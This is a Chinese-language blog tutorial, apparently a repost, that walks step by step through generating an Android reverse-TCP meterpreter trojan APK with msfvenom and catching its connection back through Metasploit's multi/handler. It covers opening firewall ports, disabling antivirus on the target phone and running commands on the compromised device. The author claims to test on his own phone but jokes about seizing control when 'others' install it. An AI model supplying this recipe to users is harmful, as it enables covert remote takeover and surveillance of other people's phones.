Metasploit 是一款开源的安全漏洞检测工具, 可以帮助安全和 IT 专业人士识别安全性问题, 验证漏洞的缓解措施, 并管理专家驱动的安全性进行评估, 提供真正的安全风险情报. 这些功能包括智能开发, 代码审计, web 应用程序扫描, 社会工程.
这篇文档只适合在 CentOS Linux 已经安装了 Metasploit 的大伙. 没有安装 Metasploit 的小伙们, 可以前往
博客去浏览并安装, 然后再回来~(如果此博客的安装已经过期了, 官方找或者网上找)
看完 Metasploit 简介后, 其下有一个工具 msfvenom 可以生成木马, 打开 Linux 终端, 最好登录 root, 怕出错, 然后输入命令
$ msfvenom
Enter 下看看都啥? 一大堆指令让你烦~
先查看一下所有类型的攻击负荷(看成木马也行), 输入命令
$ msfvenom --list payloads
Enter 下来, 数据很多, 我们从里面找 Android 类型的就行, 我是来操控手机的, 不会干其它的
复制一下黄色框的字段, tcp 格式的, 接下来会用到
Android/meterpreter/reverse_tcp
知道了 "木马" 的名称, 还得知道终端的 ip, 输入 ifconfig 查看内网 ip(俺的是本地测试的)
$ ifconfig
ip 拿到了, 还不赶紧的开始生成木木马 -_-,msfvenom 兄弟, 靠你了, 输入
$ msfvenom -p Android/meterpreter/reverse_tcp LHOST=192.168.122.129 LPORT=3333 R> first.apk
-p, --payload 使用攻击负荷. 指定一个'-'或者输入 (stdin) 用户自定义的 payloads(攻击负荷).
LHOST ip 地址
LPORT 自定义端口(注意, 那些所谓的防火墙全踏马都要关闭, 记得端口要放行且没被占用, 不然渗透没软用)
生成的木马最好能放在一个可以访问的文件夹上, 我直接 first.apk, 在终端目前路径上可以看到有文件生成. 如果没有, 那就是失败了, 检查一下你的端口是否占用! 生成成功的编译大概会出现 Payload size: 10181 bytes 字段
木马生成完毕, msfvenom 兄弟的工作就基本完工了, 接下来就有请 msfconsole 上场了, 没错, 就是打开 metasploit 的控制台, 着手配置相关信息, 开始渗透了~
直接输入 msfconsole
$ msfconsole
长久看多了单调代码的你, 下面的图形代码有没有让你灰色的世界多点点色彩~~
谈正事~ 我们需要配置什么呢? 前面生成木马的时候不是设置了 ip 和端口吗? 现在我们也要在控制台上配置 ip 和端口, 做监听来的
要做的流程大概是这些
(在 msfconsole 模式下)加载 exploit 模块
msf> use exploit/multi/handler
(exploit 模式下)选择之前我们粘贴过一次的攻击载荷: Android/meterpreter/reverse_tcp
msf exploit(multi/handler)> set payload Android/meterpreter/reverse_tcp
(exploit 模式下)查看一下列表有没有多出你设置的载荷
msf exploit(multi/handler)> show options
(exploit 模式下)设置黄色框下的 LHOST 和 LPORT, 就设置成之前生成木马搞的 ip 和端口
顺便放行端口, 输入命令 firewall-cmd --add-port=3333/tcp
firewall-cmd --add-port=3333/tcp # 开放通过 tcp 访问 3333
配置的流程都搞完了, 马上就是渗透了.
群灵觉醒, 封印解除, 出来吧! exploit
输入命令 exploit, 开始监控, 记住不要关掉, 就坐等别人的手机安装, 然后别人点击的瞬间, 俺这里马上获取到别人手机的控制权, 到时候, 嘿嘿. 当然, 俺这里是渗透自己的手机(然并软 -~)
既然是渗透自己的手机, 把生成的木马拿出来下载吧, 俺这里是 ftp 连接 Linux 成功后, 找到木马下载安装到自己的手机上(杀毒软件请关掉), 我用的是 xftp, 只要你能把那个木马拿出来下载, 管你用什么办法~~
安装好木马后, 点击打开的瞬间, 没有啥反应. 手机上没反应没关系, 关键是终端 exploit 监听有反应, 并且开始渗透并成功.
如果终端没有反应, 就是防火墙的问题, 设置的端口要放行
输个?, 查看命令列表
比如查看下手机信息
sysinfo
想打开某个应用, 输入 app_list 查看 App 列表
然后使用使用 app_run 命令打开 App 对应的 package 名称
手机上的 termux 就会自己启动
好了, 还有关于相册或者通讯录, 照相什么的指令就不讲了, 你们自己探究探究吧
来源: https://www.cnblogs.com/murenziwei/p/12002347.html